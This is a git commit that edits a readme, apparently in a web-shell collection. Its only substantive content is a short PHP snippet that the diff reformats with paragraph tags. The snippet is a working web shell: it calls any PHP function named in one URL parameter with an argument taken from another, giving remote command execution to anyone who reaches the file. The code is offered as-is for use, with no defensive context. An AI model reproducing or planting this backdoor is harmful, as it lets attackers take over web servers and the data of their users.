update readme.md

This commit is contained in:
tennc 2014-07-28 10:05:49 +08:00
parent 635d59bba7
commit fd8b66c4c7

View file

@ -6,12 +6,9 @@
***************************************************
code:
<?php
<p>
<p><?php
$func = new ReflectionFunction($_GET[m]);
<p>
echo $func->invokeArgs(array($_GET[c]));
<p>
?>
?></p>
***************************************************